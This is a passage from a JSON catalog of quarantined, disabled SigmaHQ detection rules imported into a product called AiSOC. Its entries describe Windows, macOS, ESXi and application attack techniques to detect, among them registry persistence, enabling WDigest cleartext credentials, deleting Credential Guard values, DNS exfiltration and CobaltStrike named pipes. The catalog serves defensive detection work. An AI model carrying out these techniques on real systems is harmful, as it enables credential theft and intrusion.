"sigmahq-sigma-d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "type": "detection", "name": "LOLBIN Execution From Abnormal Drive", "description": 
"Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-execution-from-abnormal-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" } }, { "id": "sigmahq-sigma-d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "type": "detection", "name": "Persistence Via Disk Cleanup Handler - Autorun", "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-disk-cleanup-handler-autorun.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" } }, { "id": "sigmahq-sigma-d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "type": "detection", "name": "Potential Persistence Via Disk Cleanup Handler - Registry", "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-disk-cleanup-handler-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml" } }, { "id": "sigmahq-sigma-d51694fe-484a-46ac-92d6-969e76d60d10", "type": "detection", "name": "Access To Potentially Sensitive Sysvol Files By Uncommon Applications", "description": "Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/access-to-potentially-sensitive-sysvol-files-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d51694fe-484a-46ac-92d6-969e76d60d10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_gpo_files.yml" } }, { "id": "sigmahq-sigma-d522eca2-2973-4391-a3e0-ef0374321dae", "type": "detection", "name": "Abused Debug Privilege by Arbitrary Parent Processes", "description": "Detection of unusual child processes by different system processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abused-debug-privilege-by-arbitrary-parent-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d522eca2-2973-4391-a3e0-ef0374321dae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml" } }, { "id": "sigmahq-sigma-d526c60a-e236-4011-b165-831ffa52ab70", "type": "detection", "name": "Windows Vulnerable Driver Blocklist Disabled", "description": "Detects when the Windows Vulnerable Driver Blocklist is set to disabled. 
This setting is crucial for preventing the loading of known vulnerable drivers,\nand its modification may indicate an attempt to bypass security controls. It is often targeted by threat actors to facilitate the installation of malicious or vulnerable drivers,\nparticularly in scenarios involving Endpoint Detection and Response (EDR) bypass techniques.\nThis rule applies to systems that support the Vulnerable Driver Blocklist feature, including Windows 10 version 1903 and later, and Windows Server 2022 and later.\nNote that this change will require a reboot to take effect, and this rule only detects the registry modification action.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-vulnerable-driver-blocklist-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d526c60a-e236-4011-b165-831ffa52ab70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable.yml" } }, { "id": "sigmahq-sigma-d54c2f06-aca9-4e2b-81c9-5317858f4b79", "type": "detection", "name": "ESXi VSAN Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. 
Seen used by malware such as DarkSide.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vsan-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d54c2f06-aca9-4e2b-81c9-5317858f4b79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml" } }, { "id": "sigmahq-sigma-d557dc06-62e8-4468-a8e8-7984124908ce", "type": "detection", "name": "HackTool - WinPwn Execution", "description": "Detects commandline keywords indicative of potential usage of the tool WinPwn. 
A tool for Windows and Active Directory reconnaissance and exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1082", "T1106", "T1518", "T1548.002", "T1552.001", "T1555", "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpwn-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d557dc06-62e8-4468-a8e8-7984124908ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml" } }, { "id": "sigmahq-sigma-d55b793d-f847-4eea-b59a-5ab09908ac90", "type": "detection", "name": "Suspicious Child Process Of Veeam Database", "description": "Detects suspicious child processes of the Veeam service process. 
This could indicate potential RCE or SQL Injection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-veeam-dabatase.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d55b793d-f847-4eea-b59a-5ab09908ac90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "type": "detection", "name": "CobaltStrike Named Pipe", "description": "Detects the creation of a named pipe as used by CobaltStrike", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "type": "detection", "name": "Files With System Process Name In 
Unsuspected Locations", "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-with-system-process-name-in-unsuspected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_system_file.yml" } }, { "id": "sigmahq-sigma-d58ba5c6-0ed7-4b9d-a433-6878379efda9", "type": "detection", "name": "Remote Access Tool - AnyDesk Incoming Connection", "description": "Detects incoming connections to AnyDesk. 
This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as a potential command-and-control channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-incoming-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d58ba5c6-0ed7-4b9d-a433-6878379efda9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml" } }, { "id": "sigmahq-sigma-d59d7842-9a21-4bc6-ba98-64bfe0091355", "type": "detection", "name": "Powershell DNSExfiltration", "description": "DNSExfiltrator allows transferring (exfiltrating) a file over a DNS-request covert channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-dnsexfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" } }, { "id": "sigmahq-sigma-d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "type": "detection", "name": "Sysprep on AppData Folder", "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysprep-on-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" } }, { "id": "sigmahq-sigma-d635249d-86b5-4dad-a8c7-d7272b788586", "type": "detection", "name": "BITS Transfer Job Download From File Sharing Domains", "description": "Detects BITS transfer job downloading files from a file sharing domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-from-file-sharing-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d635249d-86b5-4dad-a8c7-d7272b788586", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-d645ef86-2396-48a1-a2b6-b629ca3f57ff", "type": "detection", "name": "Windows Credential Guard Related Registry Value Deleted - Registry", "description": "Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-related-registry-value-deleted-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d645ef86-2396-48a1-a2b6-b629ca3f57ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_disable_credential_guard.yml" } }, { "id": "sigmahq-sigma-d65aee4d-2292-4cea-b832-83accd6cfa43", "type": "detection", "name": "Arbitrary Binary Execution Using GUP Utility", "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-binary-execution-using-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml" } }, { "id": "sigmahq-sigma-d65f37da-a26a-48f8-8159-3dde96680ad2", "type": "detection", "name": "Process Execution Error In JVM Based Application", "description": "Detects process execution related exceptions in JVM based apps, often relates to RCE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-execution-error-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d65f37da-a26a-48f8-8159-3dde96680ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_rce_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "type": "detection", "name": "NetNTLM Downgrade Attack - Registry", "description": "Detects NetNTLM downgrade 
attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netntlm-downgrade-attack-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" } }, { "id": "sigmahq-sigma-d679950c-abb7-43a6-80fb-2a480c4fc450", "type": "detection", "name": "PDQ Deploy Remote Administration Tool Execution", "description": "Detects use of the PDQ Deploy remote administration tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pdq-deploy-remote-adminstartion-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml" } }, { "id": "sigmahq-sigma-d6a9b252-c666-4de6-8806-5561bbbd3bdc", "type": "detection", "name": "Wdigest Enable UseLogonCredential", "description": 
"Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wdigest-enable-uselogoncredential.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" } }, { "id": "sigmahq-sigma-d6b5520d-3934-48b4-928c-2aa3f92d6963", "type": "detection", "name": "Important Windows Service Terminated With Error", "description": "Detects important or interesting Windows services that got terminated for whatever reason", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-service-terminated-with-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml" } }, { "id": "sigmahq-sigma-d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "type": "detection", "name": "WinSock2 Autorun Keys Modification", "description": "Detects modification of an autostart extensibility point (ASEP) in the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winsock2-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" } }, { "id": "sigmahq-sigma-d6ce7ebd-260b-4323-9768-a9631c8d4db2", "type": "detection", "name": "RestrictedAdminMode Registry Value Tampering", "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/restrictedadminmode-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" } }, { "id": "sigmahq-sigma-d7329412-13bd-44ba-a072-3387f804a106", "type": "detection", "name": "Guest Account Enabled Via Sysadminctl", "description": "Detects attempts to enable the guest account using the sysadminctl utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-account-enabled-via-sysadminctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7329412-13bd-44ba-a072-3387f804a106", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" } }, { "id": "sigmahq-sigma-d7553d7b-f485-479c-b192-cdac6edd83a4", "type": "detection", "name": "OpenCanary - NMAP XMAS Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-xmas-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7553d7b-f485-479c-b192-cdac6edd83a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yml" } }, { "id": "sigmahq-sigma-d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "type": "detection", "name": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-frombase64string-usage-on-gzip-archive-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml" } }, { "id": "sigmahq-sigma-d7654f02-e04b-4934-9838-65c46f187ebc", "type": "detection", "name": "PUA- IOX Tunneling Tool Execution", "description": "Detects the use of IOX - a 
tool for port forwarding and intranet proxy purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-iox-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7654f02-e04b-4934-9838-65c46f187ebc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_iox.yml" } }, { "id": "sigmahq-sigma-d7662ff6-9e97-4596-a61d-9839e32dee8d", "type": "detection", "name": "Add SafeBoot Keys Via Reg Utility", "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
